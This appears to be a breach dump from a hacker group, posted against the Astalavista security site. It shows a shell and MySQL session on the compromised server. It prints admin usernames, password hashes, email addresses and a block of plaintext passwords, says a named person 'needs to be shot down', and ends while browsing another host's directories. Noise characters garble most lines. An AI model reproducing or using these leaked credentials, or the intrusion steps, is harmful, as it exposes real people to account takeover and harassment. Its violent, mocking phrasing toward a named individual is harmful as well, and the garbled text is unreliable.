! g7 O- l4 H* ^9 @2 u <title>ASTALAVISTA.com - Exploits</title>
( B" p& T4 V6 o; M+ `# [0 w <link>http://www.astalavista.com/exploits</link>' z- @+ V/ P; `) u
<description>All availably Exploits.</description>
# `" E) L9 P0 b; ~ <language>en-us</language>
; ~/ N* d0 S+ B. U <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
3 d. w& M/ l- s0 ?/ A6 {" r; F <docs>http://blogs.law.harvard.edu/tech/rss</docs># T5 G# b! Q% D1 d+ c h0 s4 }4 c
<generator>Astalavista.com</generator>; R5 z& F/ n1 c" @' l& L x3 Z
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
4 g# B4 j* \- E& x0 g </channel>" V# c% f& c, d2 _
</rss>’;
B [$ `+ a5 a* _' w6 q
% E' L) g h5 [* B8 d, n if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {" X6 d+ \2 n/ T. K3 h4 ?
unlink (FULLPATH . ‘/feed/exploits.xml’);
8 y2 C3 J. [1 d' l. R }; j- ]0 R; L; |; q) j$ w" S; I
( H: K% F0 y& ~0 F+ E- o, v
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml); f$ b+ D2 I, F' C0 l# j; f
[snip]
m- m% d6 G- h O, a( e* `. x p, Z( U8 k. N. h
sh-3.2$ cat exploits.sh
; V5 w, g. n# q: I7 c#!/bin/sh
- M8 e4 i. b. T6 D" L# v( W/ r! }$ J5 g2 ~
###########################################################
: U6 J' [( K7 p+ [( X2 K# #
+ \' M* {" B2 ~) k! ~# Title: milw0rm exploits adder # C( U' v$ _* H
# Description: Add all milw0rm exploits to the #' W9 W8 E# }' H6 F
# Astalavista.com database #2 a; C5 U+ I6 W& w7 @' ]$ W( k
# #$ s+ U& R( T0 `
# Company: Astalavista Group #. p. v$ t- S8 T5 X' ^
# Author: Paulo M. Santos #
) P4 s; X7 j! x/ ]# E-Mail: 链接标记paulo.santos@astalavista.ch #' [ u8 {* G* I; c! c& m
# #
/ `" b4 l2 i! ]) a9 g# B###########################################################
: D* S0 O: c/ E, Z4 E9 L1 ~ h+ _) }" G! @
# path
. \4 n2 j( Y' D( F# q* bthis_path=/home/com/public_html/modifications/cronjobs# w# N7 w/ ~" r" y, N
: a& q7 H" h/ Z# change directory
- o! D4 S7 R* O! J1 ^cd $this_path
. G$ X% e2 t7 _/ N/ V9 O9 {* Y0 V/ a* |cd tmp// T& i, S) M: S* i5 g
- W+ x' c' U) g/ `7 y/ j
# delete files
3 {2 U, i4 M2 _8 s3 X l9 |rm -rf milw0rm.tar.* &- r1 p- q) H. I# A1 r7 ^
rm -rf milw0rm/ &
+ G$ B( D& y) Q5 M* G; U7 B$ \
* i3 t* x' n. W# `; S6 I0 F# wget milw0rm paket
+ ~/ L2 Y, h: J( d" [1 _' iwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
" y) O, D$ W0 Y9 N9 `
# r% F9 |& h; q. x- X$ z/ Y# extract milw0rm paket
& J( j! _5 A5 a2 l9 n9 ftar -xvf milw0rm.tar.bz2
. L/ |6 s+ O6 J3 D2 d+ R* d _9 x" D9 O' D* H
# change owner: R6 N6 S9 Z* T4 {' e7 [7 D
chown -R com .5 e4 l, F7 y5 A; q, K7 t C
chgrp -R com .+ u) r& |% B( Z
3 R N5 q) V2 _* o7 a! [
# execute php script
0 P2 z, m6 k0 u6 M2 rcd $this_path
3 A) R5 l {. K8 h! v! V/ yphp -q exploits.php% c7 b- T' R% V6 f7 C! P0 w
* Z) i& d8 t" A* e( N# delete files
) z6 O0 H2 d$ k0 wrm -rf tmp/milw0rm.tar.*
) B( x- {$ J$ Xrm -rf tmp/milw0rm/
4 ?9 m! J" q, a: k% V& }# e) k. e' c
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
# T' B3 Y- v, h1 ?$ o/ K5 zPaulo M. Santos needs to be shot down.% Q1 K$ g3 _" z6 B7 N1 o9 q
$ j* A5 ~& H; ~* y. S' V$ R
mysql -u contrexxuser2 -p0 C' o$ }, D5 Q9 e6 f
Enter password:
+ w5 k! F. h$ U+ b; F' o8 ]' f1 VWelcome to the MySQL monitor. Commands end with ; or \g.
2 x o2 H0 f5 C/ Y. VYour MySQL connection id is 261694
1 i3 V% s4 o5 ?( Q1 D8 b4 a2 SServer version: 5.0.45-community-log MySQL Community Edition (GPL)3 J0 ?) T/ @5 `) e1 z
# P: A4 I. v1 u# g4 r8 yType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
* b) S7 M$ Z' _& u+ _/ `! r( }( X+ k" z" X/ ?: t
mysql> show databases;" g, t' i s6 T6 D( u! |
+——————–++ I/ S2 j5 d1 @5 g& A
| Database |
# \" Z; T8 _* y: t8 V+——————–+- G, ?+ y- |; @4 z% R2 U
| information_schema |
6 p" s! G) ` L7 [5 I| com_contrexx2 |% V; d( [3 N4 i- o: \+ s
| com_contrexx2_live |, h+ R. T2 {9 l$ j s
| test |. Q# V* f0 J. m! |* M. D: y" J
+——————–+
; q0 q7 |: o" X2 N& T, Y0 u: i4 rows in set (0.00 sec), A3 p. q3 d1 J2 }' z: O
+ e; J9 C$ U9 R- \( p$ G, q. U
mysql> use com_contrexx2_live
1 {: F8 b$ \: xDatabase changed
/ ^$ V" [! a0 l1 d3 a' |! w8 N7 Mmysql> show tables;
& Y# M ~% {! X" n, D' Y$ i+ s( K+————————————————–+5 O9 [/ B5 ~$ b& e& q7 q: K
| Tables_in_com_contrexx2_live |
% A& Z" ]0 }* T+————————————————–+; ?7 ^. E) d4 Z2 e
| cc_banner_counter |
$ m6 O" n* Q9 ?) h8 ]# u7 R# W& j, `| cc_search_counter |9 p$ d# N* ~ ]
| contrexx_access_group_dynamic_ids |
9 x/ k3 W7 l5 j1 D2 L2 N* z| contrexx_access_group_static_ids |
9 x* y3 C' U2 n| contrexx_access_rel_user_group |
c' u0 K0 f9 P( L6 U0 Z) ^| contrexx_access_settings |- k3 j& I j- V, D/ x* t8 x R3 ~
| contrexx_access_user_attribute |8 N/ F3 Z: f+ R7 G, t% [
| contrexx_access_user_attribute_name |% }. Y: p6 L- p( E: [
| contrexx_access_user_attribute_value |; n% `. H6 ~5 ]5 \) X% J' W8 B/ Q
| contrexx_access_user_core_attribute |
/ _1 {2 S# S, l- u9 r| contrexx_access_user_groups |
2 A/ P, S+ _" ]& [+ P z0 @| contrexx_access_user_mail |6 i. a4 x/ u7 K: ~7 I
| contrexx_access_user_profile |
! i: ?& r- [# }* u; s- U| contrexx_access_user_title |
7 \- z( x1 T2 q1 j* A; ]2 d| contrexx_access_user_validity |
4 o: y5 o5 F. F0 V| contrexx_access_users |
! A, I+ A1 `: t N* J| contrexx_backend_areas |7 G/ U U4 f+ R- y% Q) W
| contrexx_backups |! h7 R5 i* \ H& ^2 r" I) n2 |3 B/ ^
| contrexx_content |* o/ ]8 a2 G) [1 h* Z6 |. Q
| contrexx_content_history |4 U3 h, L/ ?+ Z8 x: Z
| contrexx_content_logfile |% C! E# o" U# H
| contrexx_content_navigation |2 z4 k0 B; n/ E7 v! r( v, L
| contrexx_content_navigation_history |
1 t( k' A# X7 L$ h# X Q) M' O| contrexx_ids |
+ N/ y) \7 t/ B. F| contrexx_languages |* S& B7 M k. t; G j
| contrexx_lib_country |% O+ a5 v9 K R* O6 F5 E
| contrexx_log |, Z. C+ Y, J' Z; A1 t% }% `
| contrexx_module_alias_source |1 v8 y5 d& Y* H }" J* L' `1 S0 W
| contrexx_module_alias_target |
! h0 x( K/ v k" L3 y' t) U| contrexx_module_block_blocks |
1 D4 I1 G* W3 A' i, T| contrexx_module_block_rel_lang |+ H$ h4 i6 i r( A
| contrexx_module_block_rel_pages |
' z' v: U3 [$ ?| contrexx_module_block_settings |1 I# m/ I$ k0 N
| contrexx_module_blog_categories |
9 u; y3 H" V( R4 a8 W- T| contrexx_module_blog_comments |
( S' [7 O# M3 g2 F- S1 t+ m( l| contrexx_module_blog_message_to_category |6 H& O& j& l# ?& s
| contrexx_module_blog_messages |
" T* w5 |8 a( r- O4 _| contrexx_module_blog_messages_lang |7 B" p9 h* \4 m2 x1 N3 L! e5 {
| contrexx_module_blog_networks |9 q# c5 N4 B; |8 v
| contrexx_module_blog_networks_lang |" E. c" j% x# J" m( ]
| contrexx_module_blog_settings |& v: ^( z5 g- g: }8 p% b: y5 N
| contrexx_module_blog_votes |0 T. @" s) B" E- C% Q
| contrexx_module_calendar |
* _ p! ^" V7 J# l. f2 {3 H3 i| contrexx_module_calendar_access |4 O3 E% d& G9 A' r5 o
| contrexx_module_calendar_categories | j6 p' T% v0 D6 m& k3 }
| contrexx_module_calendar_form_data |
0 O- h5 D9 ^9 _! _| contrexx_module_calendar_form_fields |. h2 B& f$ h' m; s+ r8 \: |* B
| contrexx_module_calendar_registrations |+ d' d' \; Q* T, C
| contrexx_module_calendar_settings |6 R: {: {7 p/ h5 m2 U1 e
| contrexx_module_calendar_style |# M" d( O, D+ P1 A) P8 e) a
| contrexx_module_contact_form |6 `# v: W: x* z8 ^5 S6 ]2 q
| contrexx_module_contact_form_data |& U9 Q! ~$ [2 k) D/ T* F* |( z
| contrexx_module_contact_form_field |
- p. L7 j' d$ W4 }! N7 v! M5 \| contrexx_module_contact_settings |
6 V) r3 s* ^, N" K5 L+ n( R+ _| contrexx_module_data_categories |5 Q8 R5 C5 Y" k# n9 H
| contrexx_module_data_message_to_category |
. K) \$ K* B F; T| contrexx_module_data_messages |" I! U) \( H# n+ d- {
| contrexx_module_data_messages_lang |
$ I% R, I9 P5 r& q' ]; p7 v1 R| contrexx_module_data_placeholders |- r$ |0 N# o; f4 w; t
| contrexx_module_data_settings |) _# |" A9 F7 C1 B# m
| contrexx_module_directory_access |5 n# _' P: j* w$ M9 @9 ^
| contrexx_module_directory_categories |
- m# G; m- B; ]/ l! A( c" r| contrexx_module_directory_dir |
1 D G7 ]5 T- f7 j" Y| contrexx_module_directory_inputfields |
" e4 h/ v8 |# M& `! X2 r! C| contrexx_module_directory_levels |
- R7 i) w3 I& X6 b4 f| contrexx_module_directory_mail |) ?- _) ?: A/ Y6 A' W5 y
| contrexx_module_directory_rel_dir_cat |' L, L: B/ N! x7 a/ D
| contrexx_module_directory_rel_dir_level |2 t3 W& Q$ D- Y+ Q! L2 B
| contrexx_module_directory_settings |
/ y8 P! j0 w. p1 f" e& y| contrexx_module_directory_settings_google |' F( i0 O& n% c6 b1 A; i3 H: w
| contrexx_module_directory_vote |
+ V; z/ X4 d+ \% m| contrexx_module_docsys |
# K+ X0 Z7 c+ j2 @3 |1 m: T$ y- f* `| contrexx_module_docsys_categories |
t7 M; T8 R+ O+ p% C| contrexx_module_egov_configuration |: u7 }5 {* g9 N0 X2 o7 `
| contrexx_module_egov_orders |0 N5 Q3 Y; S; h
| contrexx_module_egov_product_calendar |9 A( d9 o' {1 {' j% ]/ b1 p# E
| contrexx_module_egov_product_fields |' c2 H$ \5 M6 v% v2 e/ n. C
| contrexx_module_egov_products |, L/ T/ @6 o3 B# Y
| contrexx_module_egov_settings |
8 e2 b0 e: o. c. v| contrexx_module_exploits |
2 _$ t1 R" [. f* p& s3 [| contrexx_module_exploits_categories |7 I" z2 x* Z; t0 @
| contrexx_module_feed_category |
: K _" `/ g, X: K7 Q1 s| contrexx_module_feed_news |
' F1 _9 Y/ B/ z" A& J1 B* q| contrexx_module_feed_newsml_association |
3 w: x: w2 t, L: o8 g| contrexx_module_feed_newsml_categories |
' W- d0 a! l" z: I5 W- P2 O# s| contrexx_module_feed_newsml_documents |" I6 s' y, h, L' {, u# @0 H
| contrexx_module_feed_newsml_providers |
/ x `( T. P& T2 x2 }+ _/ h| contrexx_module_forum_access |
0 H( C( j6 {3 { f* d- `3 r| contrexx_module_forum_categories |
- c$ K+ x1 q: M3 G0 H$ o6 X/ {| contrexx_module_forum_categories_lang |
# c: O* Q! r, x& _" o3 A| contrexx_module_forum_notification |4 y" y9 z* H5 O/ P. y
| contrexx_module_forum_postings |& I# i1 M; M f/ [5 F; I
| contrexx_module_forum_rating |
8 g; r( o% c7 ]+ ?| contrexx_module_forum_settings |0 w7 B* a8 t5 D# y
| contrexx_module_forum_statistics |+ T# v+ L# l+ @. G
| contrexx_module_gallery_categories |
9 T1 I5 |4 F" T4 }5 z| contrexx_module_gallery_comments |
# p4 ^' {4 e: h7 e( A. `, U| contrexx_module_gallery_language |' q) c& h8 Y& x+ L5 S/ Y2 |" p
| contrexx_module_gallery_language_pics |8 C$ q% A& d% K6 k% t: D: L
| contrexx_module_gallery_pictures |5 ]6 e( \2 `; V3 s1 g, `! s) Q
| contrexx_module_gallery_settings |
$ E' u; |5 _* O0 U| contrexx_module_gallery_votes |$ ~; T/ M2 f$ Z: ?" L% U8 ?
| contrexx_module_guestbook |
% q8 p: [* B: Q% z X| contrexx_module_guestbook_settings |0 I/ ~/ m* n/ x2 i6 {: I0 m% S' h9 g
| contrexx_module_livecam |
1 c* y# R6 S f| contrexx_module_livecam_settings |# R- ~: _/ O D; Z1 ?& F3 H+ G& |9 |0 u
| contrexx_module_market |
& ]$ H. m. t+ P& x' H; r8 ~8 ^| contrexx_module_market_access |
2 j+ ~4 B7 _/ T0 y w& ^6 ^ Q8 w| contrexx_module_market_categories |) D" |" M& L9 s% U
| contrexx_module_market_mail |* m9 g% S' G/ C! Y: a$ `
| contrexx_module_market_paypal |9 a7 M+ {: {5 ]4 O' B8 d1 I
| contrexx_module_market_settings |
+ `' }: w3 }/ }; m) _2 N| contrexx_module_market_spez_fields |- h# g5 y) f; `# _
| contrexx_module_mediadir_access |
$ d2 R7 n5 i, F4 E| contrexx_module_mediadir_categories |6 i" q8 H8 E- p _3 h
| contrexx_module_mediadir_comments |2 H" H s" x0 ^' N" E
| contrexx_module_mediadir_dir |
1 H( K) z, J4 F3 k p| contrexx_module_mediadir_inputfields |& U# Y, M! {* M9 _* n
| contrexx_module_mediadir_levels |
2 n8 [3 H4 K0 k2 ~* F7 j| contrexx_module_mediadir_mail |
9 x+ ?/ N, C. J# u4 R| contrexx_module_mediadir_rel_dir_cat |1 L1 d0 Q2 {+ G. _" N1 B
| contrexx_module_mediadir_rel_dir_level |0 d6 D5 |) C4 T
| contrexx_module_mediadir_reports |
0 Q9 G# a5 l$ }& H8 t) i8 M9 t| contrexx_module_mediadir_settings |
. r+ X/ @2 P w2 ]8 @1 x| contrexx_module_mediadir_settings_google |3 ^7 Y; w" V/ U
| contrexx_module_mediadir_vote |
: S% O% W+ w2 h& r5 h" q; R| contrexx_module_memberdir_directories |) W9 y) X& g7 i9 d0 s: m
| contrexx_module_memberdir_name |
5 V% R8 ~+ Y& E* v| contrexx_module_memberdir_settings |1 H4 {6 |% D5 q0 L; i& S
| contrexx_module_memberdir_values |
1 Z# j! G. T7 v4 z B4 K| contrexx_module_nettools_allowed_groups |9 X- i4 F& {( X9 N \
| contrexx_module_nettools_settings |
+ L& X& H. h" a4 u( u2 W; D8 v+ w" h| contrexx_module_news |' m" p' k* A6 a+ A: s7 Y- b- {
| contrexx_module_news_access |8 s ~: O4 x4 V. {
| contrexx_module_news_categories |) W. I: O: S( @2 h2 r- R
| contrexx_module_news_settings |! G( S6 B" Q* W* ?
| contrexx_module_news_teaser_frame |
# T* O5 q5 ?& @5 d& s| contrexx_module_news_teaser_frame_templates |" ^: j) l) T$ M5 b0 W' k
| contrexx_module_news_ticker | q- o/ Y4 ]0 T* x& j7 W/ k
| contrexx_module_newsletter |
$ y8 \- m3 ?# J| contrexx_module_newsletter_attachment |
$ j6 r k& c: |; m" \* {8 B' Q| contrexx_module_newsletter_category |
3 {- i3 C g, e6 c3 x# ^| contrexx_module_newsletter_confirm_mail |
. ~6 w/ b# `, |/ A| contrexx_module_newsletter_rel_cat_news |9 K& j, a7 V, y
| contrexx_module_newsletter_rel_user_cat |* H8 c9 z1 f$ l q" U
| contrexx_module_newsletter_settings |3 |1 Y% [7 X, m) g! I2 P
| contrexx_module_newsletter_template |2 @; P0 w" L; ~7 u
| contrexx_module_newsletter_tmp_sending |' M+ r6 D8 d/ M z; w; [
| contrexx_module_newsletter_user |
, S9 f$ s% c. E| contrexx_module_newsletter_user_title |
' g' ], i8 ]- ]$ S; r| contrexx_module_onlinetools_defaultports |
, Y0 J0 o) T( k d/ j" M' \| contrexx_module_onlinetools_defaultports_back |
! {4 S7 K% b3 h# f4 x4 B" F, f9 {| contrexx_module_onlinetools_geolitecity_blocks |! p! B% A2 c# H2 U6 }9 P
| contrexx_module_onlinetools_geolitecity_country |% Y% m r8 e9 A6 O, h
| contrexx_module_onlinetools_geolitecity_location |
& W7 e, R/ V( H7 h| contrexx_module_podcast_category |3 i/ e t; L) O! j: U, N$ e
| contrexx_module_podcast_medium |
1 Y9 T! d9 x. N+ ~$ c| contrexx_module_podcast_rel_category_lang |
" a4 [/ P; E5 D" H- m% Y| contrexx_module_podcast_rel_medium_category |5 w$ \; B: g) M$ v+ C
| contrexx_module_podcast_settings |
& Y. k% N2 L4 F# g$ @5 P- o" p| contrexx_module_podcast_template |2 ]' d( t* X$ o5 D0 W+ |, k
| contrexx_module_proxydb |
8 s! c: h4 k; e; v0 L0 a- W| contrexx_module_recommend |
. E; a- M* R; b9 L* D| contrexx_module_repository |
\, i. y9 u- y+ n7 ? b" n! L2 U| contrexx_module_securitynews_cats |/ P. N5 @$ ?4 X) s6 X- O/ X$ Y
| contrexx_module_securitynews_feeds |
+ M9 x* D2 F, v* J| contrexx_module_securitynews_news |
6 d2 o1 D. l# z4 d| contrexx_module_shop_categories |3 ~9 _6 O6 r+ H8 j# `( P% y
| contrexx_module_shop_config |
( E& Z/ k" S$ r8 P+ y. @( ? c| contrexx_module_shop_countries |2 d9 d8 J. O- V- d, ?3 p
| contrexx_module_shop_currencies |0 I3 F+ ~$ m# K C
| contrexx_module_shop_customers |
! R. O1 H2 M& d' \" Q& s, l) y| contrexx_module_shop_importimg |% I4 T) n0 U2 O! {
| contrexx_module_shop_lsv |
3 `) m+ ?2 Z" t& P2 P: z| contrexx_module_shop_mail |
% T. E4 K: t! X% R5 G| contrexx_module_shop_mail_content |
4 j# C R8 Y6 M* d% a: S, m% ~| contrexx_module_shop_manufacturer | ` U9 m, Z# d: J: v5 C
| contrexx_module_shop_order_items |: K0 Z6 p5 w4 p$ }( Z- }) T
| contrexx_module_shop_order_items_attributes |8 z4 y( b w( ^4 m+ a
| contrexx_module_shop_orders |
t7 S( n3 s0 B0 G: G; `6 E5 i3 g| contrexx_module_shop_payment |
, F+ n/ S4 Z/ G| contrexx_module_shop_payment_processors |; h! Z- \$ i' b; m; L; E
| contrexx_module_shop_pricelists |) k& O) v6 {* f; _
| contrexx_module_shop_products |
, {) d( h$ v) U" {& n% o' V7 c| contrexx_module_shop_products_attributes |2 z1 l/ X, p0 M* H% r/ L1 X; S$ I: K
| contrexx_module_shop_products_attributes_name |+ } }2 h" Y( f6 M. v. A
| contrexx_module_shop_products_attributes_value |# ]' u- S! ^/ W: A9 ~/ [" H$ n
| contrexx_module_shop_products_downloads |
, o" A! o. ~: A; w0 O| contrexx_module_shop_rel_countries |
1 A, M+ v$ f% r: s5 z1 F) F| contrexx_module_shop_rel_payment |
. }; h$ n! J' Z' B# p7 D% r| contrexx_module_shop_rel_shipment |
+ T* U' T' p+ C) o# `- f% u: ~| contrexx_module_shop_shipment_cost |( g" f) y% X. e7 I4 |( }3 t
| contrexx_module_shop_shipper |$ N4 x, x- n8 O6 M6 Y G% `
| contrexx_module_shop_vat |; a. _) D8 e4 n+ K- w0 D% b
| contrexx_module_shop_zones |8 G9 w) g0 C) g
| contrexx_module_u2u_address_list |
B% ?; u; f+ E% l| contrexx_module_u2u_message_log |
7 }8 S1 d/ Q+ v, R u0 f| contrexx_module_u2u_sent_messages |3 H. t, v; B. M Z, [" {
| contrexx_module_u2u_settings |# u% C. v2 r6 N8 c6 g+ Z1 v. R K
| contrexx_module_u2u_user_log |
4 _% x) e3 i6 N+ c9 n| contrexx_modules |3 w( a# \. W- r( G7 ?
| contrexx_sessions |
- S3 P+ s6 r$ J" f| contrexx_settings |
3 c* d1 h0 a0 @( x5 v| contrexx_settings_smtp |
: r) U. C4 R! I+ K& e| contrexx_skins |# l7 K( o5 c0 d! c" `
| contrexx_stats_browser |" ?( |9 P3 C- ]: e
| contrexx_stats_colourdepth |
* V: S& c- w7 x# A| contrexx_stats_config |, E9 d+ z7 v' o% p( s% }; D
| contrexx_stats_country |- y, O0 Y& q, Z0 r. T) c
| contrexx_stats_hostname |4 C" t2 R/ m% ]
| contrexx_stats_javascript |% A1 K+ H) O+ n) I! i5 |
| contrexx_stats_operatingsystem |/ w+ [; u+ {1 ~" D: q
| contrexx_stats_referer |
: Z4 u: q8 |/ M| contrexx_stats_requests |% }2 H& O2 L& ]6 S, Z ^
| contrexx_stats_requests_summary |
, @; `* P- [) |" \& d6 V| contrexx_stats_screenresolution |
0 A" ]+ G/ U1 p0 r5 L$ h- M| contrexx_stats_search |; i$ W. e# k5 t
| contrexx_stats_spiders |
3 O" C6 x5 X) s* O| contrexx_stats_spiders_summary |
0 g& r& y' d2 A, \0 q( i3 f6 C- C# U| contrexx_stats_visitors |" L; b- h/ `) E7 r
| contrexx_stats_visitors_summary |
( t" R( |& e* R; I1 o| contrexx_voting_additionaldata |0 h0 n" f$ B/ x3 m" J
| contrexx_voting_email |" s' [5 ^" }- W4 u& \8 @" S3 ~5 i
| contrexx_voting_rel_email_system |
0 H e. `: [7 F- K| contrexx_voting_results |
1 S& h% S+ _# O- I( ?5 ]| contrexx_voting_system |
& D! b3 K& A9 ` S. Y| foo |
# |' Z, g, l% q0 D8 \+————————————————–+
: \8 I E; O/ g% ~% ]0 j4 u8 P- m227 rows in set (0.01 sec)- P$ [: Y8 y7 n/ a1 V
Q. N: o) \% r( _$ cmysql> select count(*) as skids from contrexx_access_users;
# _1 Q% {8 L1 {. |# f. M8 y+——-+
# m8 }& t7 Z/ w| skids |$ e6 g2 V* @) h# m8 D
+——-+
9 C5 |0 S; M. f| 53699 |. W. x4 k2 D1 k
+——-+
7 d" z8 v) O' u1 row in set (0.00 sec)& X, z* y3 E5 K! e
4 y/ T: u$ M: L' e( M7 Xmysql> describe contrexx_access_users;
, `2 c% Z0 z& J; ?& @7 C& v- o+——————+——————————————+——+—–+————–+—————-+
' ]! }, j% f' Y, U, i4 L$ ]| Field | Type | Null | Key | Default | Extra |) g+ `- H% \/ z' K& U
+——————+——————————————+——+—–+————–+—————-+( x+ S4 U: y4 `
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
4 a5 X6 z% [1 @+ C! d, O+ P| is_admin | tinyint(1) unsigned | NO | | 0 | |1 T' G; p0 O$ f
| username | varchar(40) | YES | MUL | NULL | |
. j" l) e/ Y, k" }5 h| password | varchar(32) | YES | | NULL | |
, a0 F1 |0 R* h& z1 f| regdate | int(14) unsigned | NO | | 0 | |) P0 j; l _, i. Q% p
| expiration | int(14) unsigned | NO | | 0 | |
) i& ?% a2 d' Y" E3 k3 d5 M# ]& p| validity | int(10) unsigned | NO | | 0 | |
! O: W( f! k: {. }| last_auth | int(14) unsigned | NO | | 0 | |
3 X s. u3 C8 S" [| last_activity | int(14) unsigned | NO | | 0 | |2 [* a* ? ^! O# s* p
| email | varchar(255) | YES | | NULL | |
M* b$ N p# H) ]8 Z8 ^0 U. O| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
$ z& b, I& C1 y5 \1 Q8 @" U7 B| frontend_lang_id | int(2) unsigned | NO | | 0 | |
( H8 E1 R- t+ ?, _ E* K0 S9 E| backend_lang_id | int(2) unsigned | NO | | 0 | |
/ g# H! o ?4 V4 H0 x' b| active | tinyint(1) | NO | | 0 | |
$ [1 [; H- b- ^ A9 E1 o- H| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
: y$ _9 }$ W4 Y# W| restore_key | varchar(32) | NO | | | |
0 x$ N3 K! U% s4 |; J| restore_key_time | int(14) unsigned | NO | | 0 | |
# R% o! n+ a" @4 m }2 J+ p| u2u_active | enum(’0′,’1′) | NO | | 1 | |
' R, M- q8 d6 G( Y+——————+——————————————+——+—–+————–+—————-+; ~& u Q/ _8 i5 P& C/ y
18 rows in set (0.00 sec)
* }" f& ?& c# A# Y9 j
/ D7 y/ g" U! tmysql> select username,password,email from contrexx_access_users where is_admin = 1;7 M/ A# I4 {3 a( c
+————+———————————-+—————————–+
& J: p3 C3 K% U+ | z# Z| username | password | email |
% M9 o; q6 u2 U) |+————+———————————-+—————————–+* d" G5 {5 @9 d; @! n9 o! z
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |' @1 m3 a" U# Z& s1 g
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
* k( O; \' j1 J/ [; I3 |/ N| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |+ L' ]) B/ W0 S
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |( A8 a- G' H* Y \( M5 `
+————+———————————-+—————————–+7 I+ _' T3 |8 h8 U7 ]
4 rows in set (0.04 sec)
1 p4 ~) |8 L( S8 t# V
) W2 X( F% a% `3 D/ wmysql> exit;
, b( w4 E# @ h+ dBye
% O& F2 r8 T9 P* _& m3 b9 n" U" X6 K3 {& S2 S$ o; {( u
[~] There you go, your “team of security and IT professionals” is a joke.
; X# H T8 a( W( x& }$ Q$ ~$ k* i5 F ~) u+ {
+——————————+
2 H5 A6 _% \- g' o, Ksystem:f82BN3+_*1 D# n' n) q/ c" G2 I
Be1er0ph0r:belerophor4astacom
' h8 O# b7 P3 Z; L. q$ k1 Eprozac:asta4cms!
' R0 x: ^( W B4 Y* U6 \commander:mpbdaagf6m0 ~$ A2 f: h" Y0 s( w, y" [
sykadul:ak29eral
$ Y8 F! [9 ]; P$ p& w# u+——————————+
0 w( {5 L& [( b8 y d. `
9 a- I, ^6 y4 ~9 \4 Q[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s). n2 ~6 ~, ~& _! B& `# L3 [: P! r, T
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it. d% \* M+ T7 f: z& Q8 B* w+ W, v4 `
3 \. `) \" R! T1 Y+ K[~] Lets move to astalavista.net now,2 N' Y2 ^$ R5 Y3 J Y7 ^
6 i. u. r1 K; ~7 y; ^# LFrom <链接标记[url]https://www.astalavista.net/[/url]>: K# c% _* R/ ~" ?4 z+ |
>> Everyone knows that the best defense is a good offense.
& F) b. w& H- ^, d, B>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
! p1 N/ x) z V1 c. i) S, H>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.. z6 N" A. `, L* \4 N3 s& d6 r/ J, E
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”* p& g& A# W/ o$ F ^
; v: y; V5 T* k
>> Go ahead, try and hack our server . in a completely legal way!
! ?1 [9 {# w6 v/ O>> Learn by doing: We offer our members tricky tasks and challenges on an5 p$ Q5 X- ]) _
>> ongoing basis so you can test your knowledge and abilities. You can also) i# X/ p) b% F" X; T% S3 y% o; k
>> demonstrate what you.ve mastered by taking part in regular hacker contests, c# ~0 F1 W3 G) a$ v
>> and war games
2 t |+ h) X7 I+ Y
6 I, z3 b: J3 J, f% L) y: I& G( h[~] Lets take a look there, after all… they are hack-proof, aren’t they?!+ b$ L- C# ^' F1 j8 n4 G: k
4 A9 q5 V* Y U! i! e# L0 y[-] Tricky task: Find home dir of astalavista.net
: j) L& w" ^/ v8 o
: l; K: r, t+ Ssh-3.2$ ls -la ~astanet
. V, a% H8 @2 ~6 \4 ptotal 482 i; P$ k4 [# y$ ^0 w/ d3 a6 Z
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
r! [. h7 {9 ]& fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..' l; n! ^" p, n5 z
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
, e7 L- |& L6 y+ X1 g {4 h-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
7 ]2 c4 r% U5 _; x-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
$ \( `; t, ?) e2 n6 J-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile. s; k. i( Q% n8 M' m. {
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
7 e; t! ^/ ?8 j# W7 T# Cdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains |& Q2 \3 y2 C1 }% v# m
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap" e3 v/ `. q- k+ Z2 @0 ?
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
/ w2 b% A( ^: y4 ~( G* U6 E1 blrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
5 C- {2 Q, \# P, W( U& L-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
$ t( d/ p/ N, Y1 ~
@- d+ O7 B Z; lsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/" o" E( ?6 I3 ], Q1 U3 Y& u) g
sh-3.2$ ls -la
0 J$ B+ v: z' H- N1 wtotal 200
" G5 K2 X* ~+ p0 T4 edrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
( I. c0 L! b+ Udrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 .., `" _' \# R: i- h
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
